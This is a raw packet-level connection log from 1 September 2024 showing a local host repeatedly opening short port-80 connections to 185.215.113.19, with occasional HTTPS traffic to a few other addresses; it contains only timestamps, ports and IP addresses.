Sep 1, 2024 06:28:49.246906042 CEST	49786	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:49.247585058 CEST	49786	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:49.252511978 CEST	80	49786	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:49.516973972 CEST	80	49786	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:49.517034054 CEST	49786	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:49.600967884 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:49.601026058 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:49.601098061 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:49.601608992 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:49.601622105 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:49.699922085 CEST	49786	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:49.700155020 CEST	49788	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:49.706957102 CEST	80	49788	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:49.707043886 CEST	49788	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:49.707221031 CEST	49788	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:49.707406998 CEST	80	49786	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:49.707458973 CEST	49786	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:49.712512970 CEST	80	49788	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:50.232583046 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.232666969 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:50.234078884 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:50.234088898 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.234285116 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.241482019 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:50.288502932 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.480221033 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.480238914 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.480251074 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.480289936 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:50.480304956 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.480330944 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:50.480349064 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:50.482840061 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.482877016 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.482897997 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:50.482903004 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.482922077 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.482935905 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:50.482961893 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:50.484581947 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:50.484595060 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.484606028 CEST	49787	443	192.168.2.5	20.12.23.50
Sep 1, 2024 06:28:50.484611034 CEST	443	49787	20.12.23.50	192.168.2.5
Sep 1, 2024 06:28:50.519002914 CEST	80	49788	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:50.519057989 CEST	49788	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:50.519695997 CEST	49788	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:50.524593115 CEST	80	49788	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:50.799293995 CEST	80	49788	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:50.799352884 CEST	49788	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:50.904431105 CEST	49788	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:50.904700994 CEST	49789	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:50.911286116 CEST	80	49788	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:50.911540031 CEST	80	49789	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:50.911614895 CEST	49788	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:50.911642075 CEST	49789	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:50.911807060 CEST	49789	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:50.916610956 CEST	80	49789	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:51.860822916 CEST	80	49789	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:51.860903025 CEST	49789	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:51.863588095 CEST	49789	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:51.870349884 CEST	80	49789	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:52.111486912 CEST	80	49789	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:52.112812996 CEST	49789	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:52.215506077 CEST	49789	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:52.215749979 CEST	49790	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:52.220815897 CEST	80	49790	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:52.220899105 CEST	49790	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:52.220927000 CEST	80	49789	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:52.220971107 CEST	49789	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:52.221076965 CEST	49790	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:52.227401972 CEST	80	49790	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:52.964426041 CEST	80	49790	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:52.964554071 CEST	49790	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:52.965269089 CEST	49790	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:52.970076084 CEST	80	49790	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:53.213671923 CEST	80	49790	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:53.213942051 CEST	49790	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:53.324445963 CEST	49790	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:53.324743986 CEST	49791	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:53.329721928 CEST	80	49790	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:53.329780102 CEST	49790	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:53.330029964 CEST	80	49791	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:53.330089092 CEST	49791	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:53.330219984 CEST	49791	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:53.335123062 CEST	80	49791	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:54.071852922 CEST	80	49791	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:54.071928024 CEST	49791	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:54.107136011 CEST	49791	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:54.112210035 CEST	80	49791	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:54.356739998 CEST	80	49791	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:54.356803894 CEST	49791	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:54.470480919 CEST	49791	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:54.470771074 CEST	49792	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:54.475765944 CEST	80	49791	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:54.475780010 CEST	80	49792	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:54.475811958 CEST	49791	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:54.475872040 CEST	49792	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:54.476560116 CEST	49792	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:54.481359959 CEST	80	49792	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:55.219294071 CEST	80	49792	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:55.219465971 CEST	49792	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:55.220325947 CEST	49792	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:55.225248098 CEST	80	49792	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:55.466128111 CEST	80	49792	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:55.466717005 CEST	49792	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:55.572227001 CEST	49792	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:55.572519064 CEST	49793	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:55.577564955 CEST	80	49792	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:55.577631950 CEST	49792	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:55.577735901 CEST	80	49793	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:55.577800989 CEST	49793	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:55.577899933 CEST	49793	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:55.583883047 CEST	80	49793	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:56.332283020 CEST	80	49793	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:56.332351923 CEST	49793	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:56.333025932 CEST	49793	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:56.339145899 CEST	80	49793	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:56.580786943 CEST	80	49793	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:56.580883026 CEST	49793	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:56.683758020 CEST	49793	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:56.684132099 CEST	49794	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:56.688831091 CEST	80	49793	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:56.688895941 CEST	49793	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:56.689013958 CEST	80	49794	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:56.689069033 CEST	49794	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:56.689177036 CEST	49794	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:56.695702076 CEST	80	49794	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:57.602642059 CEST	80	49794	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:57.602897882 CEST	49794	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:57.605370045 CEST	49794	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:57.610644102 CEST	80	49794	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:57.853410006 CEST	80	49794	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:57.853585005 CEST	49794	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:57.958482981 CEST	49794	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:57.958787918 CEST	49795	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:57.964111090 CEST	80	49794	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:57.964174986 CEST	49794	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:57.964441061 CEST	80	49795	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:57.964498043 CEST	49795	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:57.964653015 CEST	49795	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:57.969688892 CEST	80	49795	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:58.705352068 CEST	80	49795	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:58.705486059 CEST	49795	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:58.706005096 CEST	49795	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:58.710808039 CEST	80	49795	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:58.954835892 CEST	80	49795	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:58.954915047 CEST	49795	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:59.064634085 CEST	49795	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:59.064950943 CEST	49796	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:59.070281982 CEST	80	49796	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:59.070386887 CEST	49796	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:59.070533037 CEST	49796	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:59.070557117 CEST	80	49795	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:59.070615053 CEST	49795	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:59.075915098 CEST	80	49796	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:59.811717033 CEST	80	49796	185.215.113.19	192.168.2.5
Sep 1, 2024 06:28:59.811925888 CEST	49796	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:59.812423944 CEST	49796	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:28:59.818381071 CEST	80	49796	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:00.060286999 CEST	80	49796	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:00.060353994 CEST	49796	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:00.168987036 CEST	49796	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:00.169261932 CEST	49797	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:00.174407959 CEST	80	49797	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:00.174525023 CEST	49797	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:00.174757004 CEST	80	49796	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:00.174835920 CEST	49796	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:00.174998999 CEST	49797	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:00.179826021 CEST	80	49797	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:00.930145025 CEST	80	49797	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:00.930203915 CEST	49797	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:00.930807114 CEST	49797	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:00.935985088 CEST	80	49797	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:01.178709030 CEST	80	49797	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:01.178859949 CEST	49797	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:01.394551039 CEST	49797	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:01.394845963 CEST	49798	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:01.464715004 CEST	80	49798	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:01.464787960 CEST	49798	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:01.464948893 CEST	49798	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:01.465631008 CEST	80	49797	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:01.465686083 CEST	49797	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:01.470058918 CEST	80	49798	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:02.216058969 CEST	80	49798	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:02.216130972 CEST	49798	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:02.218700886 CEST	49798	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:02.223879099 CEST	80	49798	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:02.466948032 CEST	80	49798	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:02.467011929 CEST	49798	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:02.577349901 CEST	49798	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:02.577627897 CEST	49799	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:02.582614899 CEST	80	49799	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:02.582694054 CEST	49799	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:02.582798004 CEST	49799	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:02.583177090 CEST	80	49798	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:02.583219051 CEST	49798	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:02.587872982 CEST	80	49799	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:03.435682058 CEST	80	49799	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:03.435765982 CEST	49799	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:03.436379910 CEST	49799	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:03.441395044 CEST	80	49799	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:03.683669090 CEST	80	49799	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:03.683789015 CEST	49799	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:03.858171940 CEST	49799	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:03.858470917 CEST	49800	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:03.863447905 CEST	80	49800	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:03.863507986 CEST	49800	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:03.863631964 CEST	49800	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:03.863888025 CEST	80	49799	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:03.863926888 CEST	49799	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:03.868623972 CEST	80	49800	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:04.637744904 CEST	80	49800	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:04.637904882 CEST	49800	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:04.640705109 CEST	49800	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:04.641037941 CEST	49801	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:04.646017075 CEST	80	49801	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:04.646028042 CEST	80	49800	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:04.646085978 CEST	49800	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:04.646095037 CEST	49801	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:04.646326065 CEST	49801	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:04.651431084 CEST	80	49801	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:04.652798891 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:29:04.658617973 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:29:04.658829927 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:29:05.403428078 CEST	80	49801	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:05.403559923 CEST	49801	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:05.519035101 CEST	49801	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:05.519323111 CEST	49802	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:05.524169922 CEST	80	49802	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:05.524379015 CEST	49802	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:05.524513006 CEST	80	49801	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:05.524626970 CEST	49802	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:05.524646044 CEST	49801	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:05.529496908 CEST	80	49802	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:06.285371065 CEST	80	49802	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:06.285449028 CEST	49802	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:06.331943035 CEST	49802	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:06.337167978 CEST	80	49802	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:06.581348896 CEST	80	49802	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:06.581403017 CEST	49802	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:06.686230898 CEST	49802	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:06.686508894 CEST	49803	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:06.691935062 CEST	80	49802	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:06.691996098 CEST	49802	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:06.692085981 CEST	80	49803	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:06.692244053 CEST	49803	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:06.692475080 CEST	49803	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:06.697470903 CEST	80	49803	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:07.457123995 CEST	80	49803	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:07.457199097 CEST	49803	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:07.460306883 CEST	49803	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:07.460589886 CEST	49804	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:07.465677977 CEST	80	49803	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:07.465759039 CEST	49803	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:07.465800047 CEST	80	49804	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:07.465866089 CEST	49804	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:07.466005087 CEST	49804	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:07.471132040 CEST	80	49804	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:08.214533091 CEST	80	49804	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:08.214597940 CEST	49804	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:08.331401110 CEST	49804	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:08.331701994 CEST	49805	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:08.336901903 CEST	80	49804	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:08.336936951 CEST	80	49805	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:08.336988926 CEST	49804	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:08.337018013 CEST	49805	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:08.337153912 CEST	49805	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:08.343213081 CEST	80	49805	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:09.078937054 CEST	80	49805	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:09.079021931 CEST	49805	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:09.083951950 CEST	49805	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:09.084393978 CEST	49806	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:09.089569092 CEST	80	49805	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:09.089715004 CEST	80	49806	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:09.089793921 CEST	49805	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:09.089793921 CEST	49806	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:09.090022087 CEST	49806	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:09.095392942 CEST	80	49806	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:09.294326067 CEST	49763	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:29:09.294349909 CEST	443	49763	142.250.65.238	192.168.2.5
Sep 1, 2024 06:29:09.294385910 CEST	49764	443	192.168.2.5	142.250.65.238
Sep 1, 2024 06:29:09.294416904 CEST	443	49764	142.250.65.238	192.168.2.5
Sep 1, 2024 06:29:09.844129086 CEST	80	49806	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:09.844187975 CEST	49806	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:09.952207088 CEST	49806	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:09.952533007 CEST	49807	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:09.957628965 CEST	80	49807	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:09.957773924 CEST	49807	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:09.957854033 CEST	80	49806	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:09.957959890 CEST	49807	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:09.957971096 CEST	49806	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:09.963793039 CEST	80	49807	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:10.718096018 CEST	80	49807	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:10.719233990 CEST	49807	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:10.849992037 CEST	49807	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:10.850291014 CEST	49808	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:10.857934952 CEST	80	49807	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:10.858020067 CEST	49807	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:10.858108997 CEST	80	49808	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:10.858340979 CEST	49808	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:10.861005068 CEST	49808	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:10.866245031 CEST	80	49808	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:11.606689930 CEST	80	49808	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:11.606765985 CEST	49808	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:11.717973948 CEST	49808	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:11.718239069 CEST	49809	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:11.723464012 CEST	80	49808	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:11.723573923 CEST	80	49809	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:11.725003958 CEST	49808	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:11.725033045 CEST	49809	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:11.725161076 CEST	49809	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:11.730220079 CEST	80	49809	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:12.465786934 CEST	80	49809	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:12.465848923 CEST	49809	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:12.468350887 CEST	49809	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:12.468647003 CEST	49810	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:12.474157095 CEST	80	49809	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:12.474169016 CEST	80	49810	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:12.474215984 CEST	49809	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:12.474244118 CEST	49810	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:12.474466085 CEST	49810	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:12.479662895 CEST	80	49810	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:13.227047920 CEST	80	49810	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:13.227103949 CEST	49810	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:13.374507904 CEST	49810	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:13.374778986 CEST	49811	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:13.379535913 CEST	80	49810	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:13.379578114 CEST	49810	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:13.379749060 CEST	80	49811	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:13.379803896 CEST	49811	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:13.380008936 CEST	49811	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:13.384849072 CEST	80	49811	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:14.313427925 CEST	49812	443	192.168.2.5	172.64.41.3
